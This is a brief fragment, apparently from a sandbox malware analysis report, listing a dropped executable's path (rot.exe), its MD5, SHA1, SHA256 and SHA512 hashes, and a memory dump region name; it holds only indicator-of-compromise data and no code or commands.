| SHA512 | b9b3badc7466725d988e8e414c4c73695f5a6114cff506f3b14094c71f4122641c01ca5f09117decda88fcaf2dff8ecdc3cc1f69063e83e83bdc97d30a8118eb |
C:\Users\Admin\Music\rot.exe
| MD5 | 91700f173d27d295276160158153c614 |
| SHA1 | d0d2484371184ccd4fa3ffdde9211b7b3523c815 |
| SHA256 | b145805ce254fd80d70d019984a599092359a6c453e83d1e3dd0e31894662033 |
| SHA512 | f27f4055970a36340dc1f4e9e71dc13e124134628c7f5ccef016491de4f689d46426c8b20136b71ee5757799ea29e7b8034fc18eb5ae6b2d2618a7a167386066 |
memory/3368-617-0x0000000000400000-0x000000000045E000-memory.dmp